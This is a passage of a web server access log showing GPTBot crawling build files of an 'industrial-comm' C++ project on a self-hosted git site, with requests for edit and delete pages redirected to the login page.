compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:19:41:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:19:41:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11368] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:41:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11561] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:19:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12392] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:19:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 15187] [Gzip 8.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10924] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:41:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:19:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:19:41:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:19:41:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:19:41:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:41:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 1053] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:41:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:19:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:19:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:41:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11874] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:41:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:19:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:19:41:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:41:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:19:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 1059] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:19:41:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:19:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:19:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:19:41:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 1055] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:19:41:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:41:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:41:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:41:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:41:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11518] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:19:41:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:19:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:19:41:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:41:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:41:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:41:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:41:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:19:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:19:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13386] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:19:41:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10501] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:19:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10136] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:19:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] 